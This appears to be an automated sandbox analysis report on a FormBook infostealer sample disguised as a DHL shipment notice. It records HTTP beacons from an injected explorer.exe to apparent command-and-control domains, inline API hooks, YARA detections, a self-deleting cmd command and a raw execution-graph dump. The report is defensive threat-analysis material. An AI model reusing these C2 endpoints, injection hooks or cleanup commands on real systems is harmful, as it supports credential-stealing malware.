                      May 13, 2022 16:10:37.426786900 CEST | 9890 | IN | Data Raw: 67 75 6d 65 6e 74 73 29 7d 3b 67 61 2e 6c 3d 2b 6e 65 77 20 44 61 74 65 3b 0a 20 20 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 0a 20 20 20 20 20 20 20 20 20 22 55 41 2d 31 38 30 30 33 2d 37 22 2c 0a 20 20 20 20 20 20 20 20 20 27 61 75 74 6f
                      Data Ascii: guments)};ga.l=+new Date; ga('create', "UA-18003-7", 'auto', { 'sampleRate': 0.1 }); ga('set', 'location', window.location.href.split(/[?#0-9]/)[0]); ga('set', 'anonymizeIp', true); ga('requir
                      May 13, 2022 16:10:37.426815987 CEST | 9890 | IN | Data Raw: 6e 67 3e 0a 0a 3c 70 20 63 6c 61 73 73 3d 22 6e 65 78 74 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 74 70 68 6f 6c 79 77 69 6e 39 39 2e 63 6f 6d 2f 22 3e 47 6f 20 74 6f 20 62 6c 6f 67 20 68 6f 6d 65 70 61 67 65 3c 2f 61
                      Data Ascii: ng><p class="next"><a href="http://www.rtpholywin99.com/">Go to blog homepage</a></p></div></div></div></div><div id="footer"><a href="/go/helpcenter">Help Center</a><span class="spacer">|</span><a href="/go/terms">Terms of Service</a><s
                      May 13, 2022 16:10:37.428131104 CEST | 9891 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      1 | 192.168.2.4 | 49775 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                      Timestamp | kBytes transferred | Direction | Data
                      May 13, 2022 16:10:57.733571053 CEST | 11587 | OUT | GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1
                      Host: www.keilaniclothing.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:10:57.795728922 CEST | 11589 | IN | HTTP/1.1 403 Forbidden
                      Date: Fri, 13 May 2022 14:10:57 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      X-Sorting-Hat-PodId: 250
                      X-Sorting-Hat-ShopId: 64045383931
                      X-Dc: gcp-europe-west1
                      X-Request-ID: c795f513-2a89-4e29-a885-b65e0c1175bd
                      X-XSS-Protection: 1; mode=block
                      X-Download-Options: noopen
                      X-Content-Type-Options: nosniff
                      X-Permitted-Cross-Domain-Policies: none
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 70abfb06ecb2917d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                      May 13, 2022 16:10:57.795795918 CEST | 11590 | IN | Data Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                      Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                      May 13, 2022 16:10:57.795835972 CEST | 11591 | IN | Data Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                      Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                      May 13, 2022 16:10:57.795876026 CEST | 11593 | IN | Data Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                      Data Ascii: " }, "ja": { "title": "", "content-title": "
                      May 13, 2022 16:10:57.795908928 CEST | 11593 | IN | Data Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                      Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                      May 13, 2022 16:10:57.795937061 CEST | 11593 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      2 | 192.168.2.4 | 49777 | 3.64.163.50 | 80 | C:\Windows\explorer.exe
                      Timestamp | kBytes transferred | Direction | Data
                      May 13, 2022 16:11:20.088871002 CEST | 11599 | OUT | GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1
                      Host: www.ultrakill.xyz
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:11:20.108275890 CEST | 11600 | IN | HTTP/1.1 410 Gone
                      Server: openresty
                      Date: Fri, 13 May 2022 14:11:20 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6c 74 72 61 6b 69 6c 6c 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='0; url=http://www.ultrakill.xyz/' />a </head>8</html>0


                      Code Manipulations

                      Function Name | Hook Type | Active in Processes
                      PeekMessageA | INLINE | explorer.exe
                      PeekMessageW | INLINE | explorer.exe
                      GetMessageW | INLINE | explorer.exe
                      GetMessageA | INLINE | explorer.exe
                      Function Name | Hook Type | New Data
                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE6
                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE6
                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE6
                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE6


                      Target ID:0
                      Start time:16:09:19
                      Start date:13/05/2022
                      Path:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"
                      Imagebase:0x400000
                      File size:278331 bytes
                      MD5 hash:8FBDF9F70B21179D87B83FE47B2137DD
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Target ID:1
                      Start time:16:09:21
                      Start date:13/05/2022
                      Path:C:\Users\user\AppData\Local\Temp\aeokw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                      Imagebase:0xd70000
                      File size:80384 bytes
                      MD5 hash:6F70881E0183CE9F78E300CF2C8DC48E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      Target ID:2
                      Start time:16:09:22
                      Start date:13/05/2022
                      Path:C:\Users\user\AppData\Local\Temp\aeokw.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                      Imagebase:0xd70000
                      File size:80384 bytes
                      MD5 hash:6F70881E0183CE9F78E300CF2C8DC48E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      Target ID:5
                      Start time:16:09:27
                      Start date:13/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f3b00000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      Target ID:17
                      Start time:16:09:51
                      Start date:13/05/2022
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\svchost.exe
                      Imagebase:0x2f0000
                      File size:44520 bytes
                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      Target ID:19
                      Start time:16:09:56
                      Start date:13/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
                      Imagebase:0x1190000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:20
                      Start time:16:09:57
                      Start date:13/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff647620000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high


                        Execution Graph

                        Execution Coverage:16.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.3%
                        Total number of Nodes:1372
                        Total number of Limit Nodes:22
3437->3445 3442 403275 3438->3442 3439->3428 3536 4035fe SetFilePointer 3440->3536 3442->3430 3442->3445 3443 4032fc 3537 403377 3443->3537 3445->3347 3447 406a3b 5 API calls 3446->3447 3448 403d31 3447->3448 3449 403d37 GetUserDefaultUILanguage 3448->3449 3450 403d49 3448->3450 3572 4065b5 wsprintfW 3449->3572 3452 40653c 3 API calls 3450->3452 3454 403d79 3452->3454 3453 403d47 3573 403ff3 3453->3573 3455 403d98 lstrcatW 3454->3455 3456 40653c 3 API calls 3454->3456 3455->3453 3456->3455 3459 406045 18 API calls 3460 403dca 3459->3460 3461 403e5e 3460->3461 3463 40653c 3 API calls 3460->3463 3462 406045 18 API calls 3461->3462 3464 403e64 3462->3464 3465 403dfc 3463->3465 3466 403e74 LoadImageW 3464->3466 3467 4066ab 17 API calls 3464->3467 3465->3461 3470 403e1d lstrlenW 3465->3470 3474 405f6a CharNextW 3465->3474 3468 403f1a 3466->3468 3469 403e9b RegisterClassW 3466->3469 3467->3466 3473 40140b 2 API calls 3468->3473 3471 403ed1 SystemParametersInfoW CreateWindowExW 3469->3471 3472 403f24 3469->3472 3475 403e51 3470->3475 3476 403e2b lstrcmpiW 3470->3476 3471->3468 3472->3362 3477 403f20 3473->3477 3478 403e1a 3474->3478 3480 405f3d 3 API calls 3475->3480 3476->3475 3479 403e3b GetFileAttributesW 3476->3479 3477->3472 3483 403ff3 18 API calls 3477->3483 3478->3470 3482 403e47 3479->3482 3481 403e57 3480->3481 3581 40666e lstrcpynW 3481->3581 3482->3475 3486 405f89 2 API calls 3482->3486 3484 403f31 3483->3484 3487 403fc0 3484->3487 3488 403f3d ShowWindow 3484->3488 3486->3475 3582 4057a3 OleInitialize 3487->3582 3489 4069cb 3 API calls 3488->3489 3494 403f55 3489->3494 3491 403fc6 3492 403fe2 3491->3492 3495 403fca 3491->3495 3496 40140b 2 API calls 3492->3496 3493 403f63 GetClassInfoW 3498 403f77 GetClassInfoW RegisterClassW 3493->3498 3499 403f8d DialogBoxParamW 3493->3499 3494->3493 3497 4069cb 3 API calls 3494->3497 3495->3472 3500 40140b 2 API calls 3495->3500 3496->3472 3497->3493 3498->3499 3501 40140b 2 API calls 3499->3501 3500->3472 3501->3472 
3502->3337 3503->3385 3504->3354 3505->3391 3506->3402 3508 405ce3 3507->3508 3509 403b8f ExitProcess 3508->3509 3510 405cf7 MessageBoxIndirectW 3508->3510 3510->3509 3512 401389 2 API calls 3511->3512 3513 401420 3512->3513 3513->3357 3515 40619a GetTickCount GetTempFileNameW 3514->3515 3516 4061d0 3515->3516 3517 403644 3515->3517 3516->3515 3516->3517 3517->3339 3518->3419 3519->3421 3520->3425 3522 403057 3521->3522 3523 40303f 3521->3523 3526 403067 GetTickCount 3522->3526 3527 40305f 3522->3527 3524 403048 DestroyWindow 3523->3524 3525 40304f 3523->3525 3524->3525 3525->3430 3525->3445 3555 4035fe SetFilePointer 3525->3555 3526->3525 3529 403075 3526->3529 3528 406a77 2 API calls 3527->3528 3528->3525 3530 4030aa CreateDialogParamW ShowWindow 3529->3530 3531 40307d 3529->3531 3530->3525 3531->3525 3556 403012 3531->3556 3533 40308b wsprintfW 3534 4056d0 24 API calls 3533->3534 3535 4030a8 3534->3535 3535->3525 3536->3443 3538 4033a2 3537->3538 3539 403386 SetFilePointer 3537->3539 3559 40347f GetTickCount 3538->3559 3539->3538 3542 40343f 3542->3445 3543 4061e1 ReadFile 3544 4033c2 3543->3544 3544->3542 3545 40347f 38 API calls 3544->3545 3546 4033d9 3545->3546 3546->3542 3547 403445 ReadFile 3546->3547 3549 4033e8 3546->3549 3547->3542 3549->3542 3550 4061e1 ReadFile 3549->3550 3551 406210 WriteFile 3549->3551 3550->3549 3551->3549 3553 4061e1 ReadFile 3552->3553 3554 4035fb 3553->3554 3554->3428 3555->3436 3557 403021 3556->3557 3558 403023 MulDiv 3556->3558 3557->3558 3558->3533 3560 4035d7 3559->3560 3561 4034ad 3559->3561 3562 40302e 32 API calls 3560->3562 3571 4035fe SetFilePointer 3561->3571 3568 4033a9 3562->3568 3564 4034b8 SetFilePointer 3567 4034dd 3564->3567 3565 4035e8 ReadFile 3565->3567 3566 40302e 32 API calls 3566->3567 3567->3565 3567->3566 3567->3568 3569 406210 WriteFile 3567->3569 3570 4035b8 SetFilePointer 3567->3570 3568->3542 3568->3543 3569->3567 3570->3560 3571->3564 3572->3453 3574 404007 3573->3574 3589 4065b5 wsprintfW 3574->3589 
3576 404078 3590 4040ac 3576->3590 3578 403da8 3578->3459 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3461 3593 404616 3582->3593 3584 4057c6 3588 4057ed 3584->3588 3596 401389 3584->3596 3585 404616 SendMessageW 3586 4057ff OleUninitialize 3585->3586 3586->3491 3588->3585 3589->3576 3591 4066ab 17 API calls 3590->3591 3592 4040ba SetWindowTextW 3591->3592 3592->3579 3594 40462e 3593->3594 3595 40461f SendMessageW 3593->3595 3594->3584 3595->3594 3598 401390 3596->3598 3597 4013fe 3597->3584 3598->3597 3599 4013cb MulDiv SendMessageW 3598->3599 3599->3598 3600 4040cb 3601 4040e3 3600->3601 3602 404244 3600->3602 3601->3602 3603 4040ef 3601->3603 3604 404295 3602->3604 3605 404255 GetDlgItem GetDlgItem 3602->3605 3608 4040fa SetWindowPos 3603->3608 3609 40410d 3603->3609 3607 4042ef 3604->3607 3617 401389 2 API calls 3604->3617 3676 4045ca 3605->3676 3611 404616 SendMessageW 3607->3611 3618 40423f 3607->3618 3608->3609 3612 404116 ShowWindow 3609->3612 3613 404158 3609->3613 3610 40427f KiUserCallbackDispatcher 3614 40140b 2 API calls 3610->3614 3619 404301 3611->3619 3620 404231 3612->3620 3621 404136 GetWindowLongW 3612->3621 3615 404160 DestroyWindow 3613->3615 3616 404177 3613->3616 3614->3604 3623 404574 3615->3623 3624 40417c SetWindowLongW 3616->3624 3625 40418d 3616->3625 3626 4042c7 3617->3626 3628 404555 DestroyWindow EndDialog 3619->3628 3631 40140b 2 API calls 3619->3631 3634 4066ab 17 API calls 3619->3634 3639 4045ca 18 API calls 3619->3639 3648 4045ca 18 API calls 3619->3648 3682 404631 3620->3682 3621->3620 3622 40414f ShowWindow 3621->3622 3622->3613 3623->3618 3632 404584 ShowWindow 3623->3632 3624->3618 3625->3620 3629 404199 GetDlgItem 3625->3629 3626->3607 3630 4042cb SendMessageW 3626->3630 3628->3623 3633 4041aa SendMessageW IsWindowEnabled 3629->3633 3635 4041c7 3629->3635 3630->3618 3631->3619 3632->3618 3633->3618 3633->3635 3634->3619 3636 4041cc 3635->3636 3637 4041d4 3635->3637 3640 40421b SendMessageW 
3635->3640 3641 4041e7 3635->3641 3679 4045a3 3636->3679 3637->3636 3637->3640 3639->3619 3640->3620 3643 404204 3641->3643 3644 4041ef 3641->3644 3642 404202 3642->3620 3646 40140b 2 API calls 3643->3646 3645 40140b 2 API calls 3644->3645 3645->3636 3647 40420b 3646->3647 3647->3620 3647->3636 3649 40437c GetDlgItem 3648->3649 3650 404391 3649->3650 3651 404399 ShowWindow EnableWindow 3649->3651 3650->3651 3696 4045ec EnableWindow 3651->3696 3653 4043c3 EnableWindow 3658 4043d7 3653->3658 3654 4043dc GetSystemMenu EnableMenuItem SendMessageW 3655 40440c SendMessageW 3654->3655 3654->3658 3655->3658 3657 4040ac 18 API calls 3657->3658 3658->3654 3658->3657 3697 4045ff SendMessageW 3658->3697 3698 40666e lstrcpynW 3658->3698 3660 40443b lstrlenW 3661 4066ab 17 API calls 3660->3661 3662 404451 SetWindowTextW 3661->3662 3663 401389 2 API calls 3662->3663 3665 404462 3663->3665 3664 404495 DestroyWindow 3664->3623 3666 4044af CreateDialogParamW 3664->3666 3665->3618 3665->3619 3665->3664 3667 404490 3665->3667 3666->3623 3668 4044e2 3666->3668 3667->3618 3669 4045ca 18 API calls 3668->3669 3670 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3669->3670 3671 401389 2 API calls 3670->3671 3672 404533 3671->3672 3672->3618 3673 40453b ShowWindow 3672->3673 3674 404616 SendMessageW 3673->3674 3675 404553 3674->3675 3675->3623 3677 4066ab 17 API calls 3676->3677 3678 4045d5 SetDlgItemTextW 3677->3678 3678->3610 3680 4045b0 SendMessageW 3679->3680 3681 4045aa 3679->3681 3680->3642 3681->3680 3683 404649 GetWindowLongW 3682->3683 3684 4046f4 3682->3684 3683->3684 3685 40465e 3683->3685 3684->3618 3685->3684 3686 40468b GetSysColor 3685->3686 3687 40468e 3685->3687 3686->3687 3688 404694 SetTextColor 3687->3688 3689 40469e SetBkMode 3687->3689 3688->3689 3690 4046b6 GetSysColor 3689->3690 3691 4046bc 3689->3691 3690->3691 3692 4046c3 SetBkColor 3691->3692 3693 4046cd 3691->3693 3692->3693 3693->3684 3694 4046e0 DeleteObject 3693->3694 3695 4046e7 
CreateBrushIndirect 3693->3695 3694->3695 3695->3684 3696->3653 3697->3658 3698->3660 3821 4016cc 3822 402da6 17 API calls 3821->3822 3823 4016d2 GetFullPathNameW 3822->3823 3824 4016ec 3823->3824 3830 40170e 3823->3830 3827 4069a4 2 API calls 3824->3827 3824->3830 3825 401723 GetShortPathNameW 3826 402c2a 3825->3826 3828 4016fe 3827->3828 3828->3830 3831 40666e lstrcpynW 3828->3831 3830->3825 3830->3826 3831->3830 3832 401e4e GetDC 3833 402d84 17 API calls 3832->3833 3834 401e60 GetDeviceCaps MulDiv ReleaseDC 3833->3834 3835 402d84 17 API calls 3834->3835 3836 401e91 3835->3836 3837 4066ab 17 API calls 3836->3837 3838 401ece CreateFontIndirectW 3837->3838 3839 402638 3838->3839 3840 402950 3841 402da6 17 API calls 3840->3841 3843 40295c 3841->3843 3842 402972 3845 406139 2 API calls 3842->3845 3843->3842 3844 402da6 17 API calls 3843->3844 3844->3842 3846 402978 3845->3846 3868 40615e GetFileAttributesW CreateFileW 3846->3868 3848 402985 3849 402a3b 3848->3849 3852 4029a0 GlobalAlloc 3848->3852 3853 402a23 3848->3853 3850 402a42 DeleteFileW 3849->3850 3851 402a55 3849->3851 3850->3851 3852->3853 3854 4029b9 3852->3854 3855 403377 40 API calls 3853->3855 3869 4035fe SetFilePointer 3854->3869 3857 402a30 CloseHandle 3855->3857 3857->3849 3858 4029bf 3859 4035e8 ReadFile 3858->3859 3860 4029c8 GlobalAlloc 3859->3860 3861 4029d8 3860->3861 3862 402a0c 3860->3862 3863 403377 40 API calls 3861->3863 3864 406210 WriteFile 3862->3864 3867 4029e5 3863->3867 3865 402a18 GlobalFree 3864->3865 3865->3853 3866 402a03 GlobalFree 3866->3862 3867->3866 3868->3848 3869->3858 3870 401956 3871 402da6 17 API calls 3870->3871 3872 40195d lstrlenW 3871->3872 3873 402638 3872->3873 3874 4014d7 3875 402d84 17 API calls 3874->3875 3876 4014dd Sleep 3875->3876 3878 402c2a 3876->3878 3879 4020d8 3880 40219c 3879->3880 3881 4020ea 3879->3881 3884 401423 24 API calls 3880->3884 3882 402da6 17 API calls 3881->3882 3883 4020f1 3882->3883 3885 402da6 17 API calls 3883->3885 3889 4022f6 
